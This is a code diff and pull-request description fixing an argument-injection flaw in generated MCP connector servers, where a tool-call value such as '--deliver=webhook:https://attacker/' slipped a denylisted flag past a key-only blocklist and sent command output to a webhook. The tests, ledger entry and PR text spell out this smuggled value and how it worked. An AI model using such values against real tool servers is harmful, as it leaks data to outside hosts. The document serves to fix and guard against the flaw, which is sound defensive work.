-  refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
-  the value of that one named flag, or rejects it, and it can never become a second flag.
+  refuses such as `--deliver`, which can send command output to a URL. Every argument that
+  carries a value now travels glued to its flag as one word (`--flag=value`), so the CLI only
+  ever reads it as the value of that one named flag, or rejects it, and it can never become a
+  second flag. A plain yes/no flag is still a bare `--flag`, and an empty value is still left out.
   Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.4] - 2026-09-01

--- a/skills/zammad/cli/internal/mcp/cobratree/filesystem_gate_test.go
+++ b/skills/zammad/cli/internal/mcp/cobratree/filesystem_gate_test.go
@@ -20,8 +20,10 @@ func forwardedCLIArgs(args map[string]any) []string {
 }
 
 func hasFlagPair(argv []string, flag, value string) bool {
-	for i := 0; i+1 < len(argv); i++ {
-		if argv[i] == flag && argv[i+1] == value {
+	// Values are joined to their flag (handfixes.json: mcp-argv-value-joined),
+	// so the pair is one argv element.
+	for _, a := range argv {
+		if a == flag+"="+value {
 			return true
 		}
 	}

--- a/skills/zammad/cli/internal/mcp/cobratree/shellout.go
+++ b/skills/zammad/cli/internal/mcp/cobratree/shellout.go
@@ -314,6 +314,13 @@ func cliArgsFromMCP(args map[string]any, blocked map[string]bool) []string {
 	}
 	sort.Strings(keys)
 
+	// Hand-wired (handfixes.json: mcp-argv-value-joined): every value is
+	// joined to its flag as ONE argv element. Emitted as a separate element,
+	// a value beginning with "--" is parsed by pflag as its own flag whenever
+	// the preceding flag is a bool (NoOptDefVal does not consume the next
+	// token), which let a tool-call VALUE smuggle a denylisted root flag past
+	// the key-only filter above. Joined, pflag rejects it on a bool flag and
+	// contains it as the literal value on a string flag.
 	var out []string
 	for _, k := range keys {
 		v := args[k]
@@ -323,10 +330,10 @@ func cliArgsFromMCP(args map[string]any, blocked map[string]bool) []string {
 				out = append(out, "--"+k)
 			}
 		case float64:
-			out = append(out, "--"+k, strconv.FormatFloat(tv, 'f', -1, 64))
+			out = append(out, "--"+k+"="+strconv.FormatFloat(tv, 'f', -1, 64))
 		case string:
 			if tv != "" {
-				out = append(out, "--"+k, tv)
+				out = append(out, "--"+k+"="+tv)
 			}
 		case []any:
 			if len(tv) > 0 {
@@ -334,11 +341,11 @@ func cliArgsFromMCP(args map[string]any, blocked map[string]bool) []string {
 				for _, item := range tv {
 					parts = append(parts, fmt.Sprintf("%v", item))
 				}
-				out = append(out, "--"+k, strings.Join(parts, ","))
+				out = append(out, "--"+k+"="+strings.Join(parts, ","))
 			}
 		default:
 			if v != nil {
-				out = append(out, "--"+k, fmt.Sprintf("%v", v))
+				out = append(out, "--"+k+"="+fmt.Sprintf("%v", v))
 			}
 		}
 	}

--- a/skills/zammad/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/zammad/cli/internal/mcp/cobratree/shellout_test.go
@@ -784,15 +784,20 @@ func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
 		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
 	}
 
-	// Every value-carrying type is joined, never split.
-	for name, args := range map[string]map[string]any{
-		"float": {"limit": 5.0},
-		"list":  {"ids": []any{"a", "b"}},
+	// Every value-carrying branch emits exactly ONE element - including the
+	// default branch (a nested object) - so no branch can split at runtime.
+	for _, tc := range []struct {
+		name string
+		args map[string]any
+		want string
+	}{
+		{"float", map[string]any{"limit": 5.0}, "--limit=5"},
+		{"list", map[string]any{"ids": []any{"a", "b"}}, "--ids=a,b"},
+		{"object", map[string]any{"filter": map[string]any{"a": "1"}}, "--filter=map[a:1]"},
 	} {
-		for _, tok := range cliArgsFromMCP(args, blockedRootFlags) {
-			if !strings.Contains(tok, "=") {
-				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
-			}
+		got := cliArgsFromMCP(tc.args, blockedRootFlags)
+		if len(got) != 1 || got[0] != tc.want {
+			t.Fatalf("%s: got %#v, want exactly [%q]", tc.name, got, tc.want)
 		}
 	}
 }

--- a/skills/zammad/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/zammad/cli/internal/mcp/cobratree/shellout_test.go
@@ -86,7 +86,7 @@ func TestCliArgsFromMCP_BlocksRootFlags(t *testing.T) {
 		"profile":  true,
 		"token":    true,
 	})
-	want := []string{"--limit", "10"}
+	want := []string{"--limit=10"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP dropped/kept wrong keys: got %v, want %v", got, want)
 	}
@@ -115,7 +115,7 @@ func TestCliArgsFromMCP_AllowsPerCommandFlags(t *testing.T) {
 		"tags":    []any{"a", "b"},
 	}
 	got := cliArgsFromMCP(in, map[string]bool{"args": true})
-	want := []string{"--limit", "25", "--query", "alpha", "--tags", "a,b", "--verbose"}
+	want := []string{"--limit=25", "--query=alpha", "--tags=a,b", "--verbose"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP per-command passthrough: got %v, want %v", got, want)
 	}
@@ -171,7 +171,7 @@ func TestBlockedStructuredArgsOnlyDropsInheritedRootFlags(t *testing.T) {
 		"config":  "/tmp/evil.yaml",
 		"json":    "true",
 	}, blocked)
-	want := []string{"--json", "true", "--profile", "local-profile"}
+	want := []string{"--json=true", "--profile=local-profile"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP command-aware blocklist: got %v, want %v", got, want)
 	}
@@ -389,7 +389,7 @@ func TestCLIArgsFromMCPSkipsStructuredPositionals(t *testing.T) {
 		"id":       "123",
 		"format":   "json",
 	}, blocked)
-	want := []string{"--format", "json"}
+	want := []string{"--format=json"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP forwarded positionals as flags: got %v, want %v", got, want)
 	}
@@ -723,4 +723,113 @@ func toolResultText(result *mcplib.CallToolResult) string {
 		return ""
 	}
 	return text.Text
+}
+
+// TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag guards the hand-fix
+// mcp-argv-value-joined (handfixes.json). blockedRootFlags filters KEYS; the
+// converter used to emit each value as its own argv element, and because a
+// Cobra bool flag has NoOptDefVal and does not consume the token after it,
+// pflag parsed that value as a second flag - so {"json": "--deliver=..."}
+// became `--json --deliver=...` and the denylisted --deliver took effect.
+// Every value must now be joined to its flag as ONE element, and that element
+// must be inert when the real flag set parses it: refused on a bool flag,
+// contained on a string flag.
+func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
+	const smuggled = "--deliver=webhook:https://x/"
+	got := cliArgsFromMCP(map[string]any{"json": smuggled}, blockedRootFlags)
+	want := []string{"--json=" + smuggled}
+	if !reflect.DeepEqual(got, want) {
+		t.Fatalf("cliArgsFromMCP emitted the value as its own argv element: got %#v, want %#v", got, want)
+	}
+
+	newRoot := func(jsonIsBool bool) *cobra.Command {
+		root := &cobra.Command{Use: "root"}
+		if jsonIsBool {
+			root.Flags().Bool("json", false, "json output")
+		} else {
+			root.Flags().String("json", "", "json output")
+		}
+		root.Flags().String("deliver", "", "delivery target")
+		return root
+	}
+
+	// The defect shape, so the guard is proven in both directions: the split
+	// emission really does let --deliver through a bool --json.
+	split := newRoot(true)
+	if err := split.ParseFlags([]string{"--json", smuggled}); err != nil {
+		t.Fatalf("defect-shape probe: split argv did not parse: %v", err)
+	}
+	if deliver, _ := split.Flags().GetString("deliver"); deliver != "webhook:https://x/" {
+		t.Fatalf("defect-shape probe: split argv should have set --deliver, got %q", deliver)
+	}
+
+	// Joined onto a bool flag, pflag refuses the value outright ...
+	boolRoot := newRoot(true)
+	if err := boolRoot.ParseFlags(got); err == nil {
+		t.Fatalf("pflag accepted %q as a bool --json value", got[0])
+	}
+	if deliver, _ := boolRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a bool flag: %q", deliver)
+	}
+
+	// ... and joined onto a string flag it is contained as the literal value.
+	strRoot := newRoot(false)
+	if err := strRoot.ParseFlags(got); err != nil {
+		t.Fatalf("joined argv did not parse on a string flag: %v", err)
+	}
+	if v, _ := strRoot.Flags().GetString("json"); v != smuggled {
+		t.Fatalf("string --json = %q, want the literal value %q", v, smuggled)
+	}
+	if deliver, _ := strRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
+	}
+
+	// Every value-carrying type is joined, never split.
+	for name, args := range map[string]map[string]any{
+		"float": {"limit": 5.0},
+		"list":  {"ids": []any{"a", "b"}},
+	} {
+		for _, tok := range cliArgsFromMCP(args, blockedRootFlags) {
+			if !strings.Contains(tok, "=") {
+				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
+			}
+		}
+	}
+}
+
+// TestShellOutJoinsValuesSoTheyCannotSmuggleRootFlags is the end-to-end
+// half of mcp-argv-value-joined: the argv the child process actually
+// receives. The exploited shape was a doctor tool call whose json value
+// carried a denylisted --deliver.
+func TestShellOutJoinsValuesSoTheyCannotSmuggleRootFlags(t *testing.T) {
+	bin := writeArgvHelper(t)
+	handler := shellOutToCLI(
+		func() (string, error) { return bin, nil },
+		[]string{"doctor"},
+		map[string]bool{"args": true, "deliver": true},
+		map[string]bool{"json": true},
+		nil,
+		true,
+		nil,
+	)
+
+	result, err := handler(context.Background(), mcplib.CallToolRequest{Params: mcplib.CallToolParams{
+		Arguments: map[string]any{"json": "--deliver=webhook:https://x/"},
+	}})
+	if err != nil {
+		t.Fatalf("handler returned transport error: %v", err)
+	}
+	if result.IsError {
+		t.Fatalf("handler returned tool error: %s", toolResultText(result))
+	}
+	got := decodeArgvResult(t, result)
+	want := []string{"doctor", "--json=--deliver=webhook:https://x/"}
+	if !reflect.DeepEqual(got, want) {
+		t.Fatalf("shellout argv = %#v, want %#v", got, want)
+	}
+	for _, tok := range got {
+		if strings.HasPrefix(tok, "--deliver") {
+			t.Fatalf("a tool-call value reached the child as its own --deliver argv element: %#v", got)
+		}
+	}
 }

--- a/skills/zammad/handfixes.json
+++ b/skills/zammad/handfixes.json
@@ -186,6 +186,35 @@
      "min_count": 1
     }
    ]
+  },
+  {
+   "id": "mcp-argv-value-joined",
+   "summary": "cliArgsFromMCP emitted every tool-call value as its OWN argv element after its flag (--json <value>). Every value-carrying branch (string, float64, []any, default) now joins the value to the flag as one element (--json=<value>); bool true stays a bare --flag and the empty-string skip is unchanged.",
+   "why": "blockedRootFlags and blockedDestinationFlags filter KEYS only. A Cobra bool flag has NoOptDefVal and does not consume the token after it, so a tool-call VALUE that begins with '--' was parsed by pflag as its own flag: {\"json\": \"--deliver=webhook:https://attacker/\"} became argv `--json --deliver=webhook:...` and the denylisted --deliver took effect. Proven end to end on the real hudu-mcp binary (this same generated shellout.go) during the PR #317 review: a local webhook received 4,797 bytes of `doctor --json` output. Reported privately per SECURITY.md on 2026-09-09 as affecting the whole fleet (six connectors spot-checked by the reporter); this is the fleet backport of datagate commit 4075043e. Joined, pflag rejects the value outright on a bool flag (strconv.ParseBool) and contains it as the literal value on a string flag, so no value can ever reach a second flag. Fixed upstream in cli-printing-press main at be378adf (#4647, closes #4643, 2026-09-09) with the identical four lines, but NOT yet in a tagged press release (latest 4.32.1), so a reprint from any press at or below 4.32.1 REINTRODUCES the defect while go build and go test stay green; this entry is what notices. Retire it only after a reprint from a press release that carries #4647. code_only because the explanatory comment above the loop describes the joined form - the assert must be satisfied by the emission lines themselves. shellout_test.go (TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag) proves both directions: the split argv sets --deliver, the joined argv cannot.",
+   "status": "active",
+   "asserts": [
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+tv)",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "\"--\"+k+\"=\"+",
+     "min_count": 4,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "not_contains": "\"--\"+k, "
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
+     "min_count": 1
+    }
+   ]
   }
  ]
 }

--- a/skills/zammad/handfixes.json
+++ b/skills/zammad/handfixes.json
@@ -201,8 +201,20 @@
     },
     {
      "file": "cli/internal/mcp/cobratree/shellout.go",
-     "contains": "\"--\"+k+\"=\"+",
-     "min_count": 4,
+     "contains": "out = append(out, \"--\"+k+\"=\"+strconv.FormatFloat(tv, 'f', -1, 64))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+strings.Join(parts, \",\"))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+fmt.Sprintf(\"%v\", v))",
+     "min_count": 1,
      "code_only": true
     },
     {
@@ -212,7 +224,14 @@
     {
      "file": "cli/internal/mcp/cobratree/shellout_test.go",
      "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
-     "min_count": 1
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "\"--filter=map[a:1]\"",
+     "min_count": 1,
+     "code_only": true
     }
    ]
   }


### PR DESCRIPTION
## Summary

A tool-call **value** could smuggle a denylisted root flag past the MCP server on every connector in the fleet. `cliArgsFromMCP` emitted `--flag` and its value as two argv elements; `blockedRootFlags` / `blockedDestinationFlags` filter keys only; a Cobra bool flag does not consume the next token, so `{"json":"--deliver=webhook:https://attacker/"}` became `--json --deliver=...` and `--deliver` shipped `doctor --json` output to the webhook. Proven end to end on the real `hudu-mcp` binary during the #317 review, and reported privately per SECURITY.md on 2026-09-09 as affecting the whole fleet (the reporter spot-checked six connectors; it is 65/65).

This is the fleet backport of datagate commit 4075043e (#317). Upstream cli-printing-press landed the identical four lines today (be378adf, #4647, closes #4643) but no tagged press release carries them yet (latest 4.32.1), so every connector also gets a `mcp-argv-value-joined` ledger entry that makes a reprint from a still-split press fail `check_handfixes`.

## Second argv builder (found by Codex round one)

The recipe intent handlers in `internal/mcp/intents.go` (10 connectors: acronis, action1, avanan, axcient, blumira, cork, cove, immybot, levelio, liongard) build argv outside `cliArgsFromMCP`. On avanan, cork and immybot a tool-call positional lands ahead of the recipe's own flags with no flag-like check, so `{"domain":"--deliver=webhook:https://attacker/"}` became `exceptions find --deliver=... --agent`. Cured: every `appendRecipePositional` call site first runs `rejectFlagLikeRecipeValue` (mirrors `validatePositionalArgsForMCP`), `appendRecipeStringFlag` always joins, handler-level tests prove a flag-like value never reaches the CLI, and a second ledger entry `mcp-recipe-argv-not-flag-like` guards it. Upstream be378adf does **not** fix this path.

## Third site (found by Codex round two)

`skills/aws-billing/cli/internal/cli/report.go` re-emitted the MCP-settable Slack channel to `slack-pp-cli` as `--channel <v>`; safe only while that external parser keeps `--channel` a string flag. Now `slackMessageArgs` joins `--channel=` and `--text=`, with a test and a `slack-delegation-argv-joined` ledger entry.

## What changed (65 connectors, identical)

- `cli/internal/mcp/cobratree/shellout.go`: every value-carrying branch (float64, string, []any, default) now emits `--flag=value` as one element. pflag rejects the joined value outright on a bool flag and contains it as the literal value on a string flag, so a value can never become a second flag.
- `handfixes.json`: `mcp-argv-value-joined` entry (asserts the four joined lines, bans the split form, requires the test).
- `cli/internal/mcp/cobratree/shellout_test.go`: `TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag` proves both directions against real pflag (the split argv sets `--deliver`; the joined argv cannot). The end-to-end `shellOutToCLI` test is added on the 9 connectors whose harness has `writeArgvHelper`. Pre-existing assertions pinned to the split shape are rewritten to the joined shape (`filesystem_gate_test.go` helper included).
- `CHANGELOG.md`: undated next-patch section; `release.py` dates it at stamp time.

## Receipts

- gofmt clean; `go vet` + `go test ./internal/mcp/cobratree/` green on 65/65
- `check_handfixes.py --changed` PASS; reverting the hudu line makes it FAIL naming `mcp-argv-value-joined` (both directions)
- `check_mcp_gate.py --slug hudu` PASS
- End-to-end on real binaries (hudu-cli + hudu-mcp built from origin/main and from this branch, driven over stdio JSON-RPC, local HTTP listener): unpatched `tools/call reconcile {"json":"--deliver=webhook:http://127.0.0.1:PORT/"}` returned the normal JSON result **and** the listener received a 74-byte POST of the same output (silent tee); patched returned `invalid argument "--deliver=..." for "--json" flag: strconv.ParseBool` and the listener received nothing. Benign bool and string arguments still work on the patched pair. (`doctor` is a framework command and is not an MCP tool on hudu; the #317 proof used datagate's surface.)
- Codex adversarial review, three rounds (read-only, high reasoning): round one REVISE (found the recipe-intent path, a partial-revert that beat the ledger, CHANGELOG overstatement); round two REVISE at 97% (aws-billing Slack delegation split argv, guard edge cases, immybot ledger multiplicity, CHANGELOG precision); round three **APPROVED at 99%**, no new defects, every earlier finding CURED.
- Final tree: `go vet` + `go test` green on 65/65 (`./internal/mcp/...` on the 10 recipe connectors); `check_handfixes --all` PASS

## Not in this PR

- Version stamps and tags. `release.py --slug` must be the last commit before each release (stamp-last doctrine); the fleet wave follows this merge.
- #311 (riverside-fm) and #317 (datagate) already carry the fix on their branches.
- The upstream commit also fixes a variadic raw-args collapse; that is a separate functional change and arrives by reprint.

🤖 Generated with [Claude Code](https://claude.com/claude-code)

https://claude.ai/code/session_01Fqaut7zyUkajuGFQpD1CC4
